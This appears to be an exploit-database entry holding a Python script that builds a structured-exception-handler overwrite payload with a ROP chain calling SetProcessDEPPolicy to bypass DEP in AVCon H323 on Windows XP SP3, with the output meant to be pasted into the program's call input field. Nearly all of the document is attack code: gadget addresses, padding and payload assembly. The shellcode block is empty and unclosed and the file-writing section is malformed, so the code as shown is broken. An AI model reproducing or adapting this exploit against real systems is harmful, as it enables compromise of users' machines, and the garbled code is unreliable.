AVCon DEP Bypass

Author: Blake Published: 2011-09-21 Verified: Verified



# DEP Bypass for OptIn/OptOut
# all modules used are not aslr aware
# script produces a text file, copy the contents
# paste in the input field next to the call button
# discovered by Dillon Beresford

import sys
from struct import pack

print "\n====================="
print "AVCon H323 DEP Bypass"
print "  Written by Blake   "
print "  Tested on XP SP3   "
print "=====================\n"

# around 619 bytes of space before seh overwrite
# if more space is needed, around 2263 bytes after seh overwrite
# calc.exe
shellcode =(

# SetProcessDEPPolicy ROP Chain
seh = pack('<L',0x1001414a)     # {pivot 2072}  # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,814 # RETN    ** [avnmc2.dll]
rop_nop = "\x41" * 3      # needed to align rop nop
rop_nop += pack('<L',0x10024c43) * 90  # RETN - avnmc2.dll
rop = pack('<L',0x20047e99)     # POP EBX, RETN - HikPlayM4.dll
rop += "\xff\xff\xff\xff"
rop += pack('<L',0x6de13c78)    # INC EBX # RETN 00    ** [xish264.dll]
rop += pack('<L',0x6ddc48e4)    # POP EBP, RETN - xish264.dll 
rop += pack('<L',0x7c8622a4)    # SetProcessDEPPolicy - XP SP3
rop += pack('<L',0x20050f44)    # POP EDI, RETN - HikPlayM4.dll
rop += pack('<L',0x20050f45)    # RETN
rop += pack('<L',0X20014DE1)    # POP ESI, RETN
rop += pack('<L',0x20050f45)    # RETN
rop += pack('<L',0x10016d22)    # PUSHAD # RETN    ** [avnmc2.dll]

nops = "\x90" * 20
junk = "\x43" * 5000
buffer = "\x41" * (1023 - len(rop_nop + rop + nops + shellcode))  # SEH overwritten at 1023

print "[+] Creating file"
 file = open("exploit.txt","w")
 file.write(rop_nop + rop + nops + shellcode + buffer + seh + junk)
 print "[+] File created"
 print "[X] Error creating file!"

raw_input("[+] Press any key to exit\n")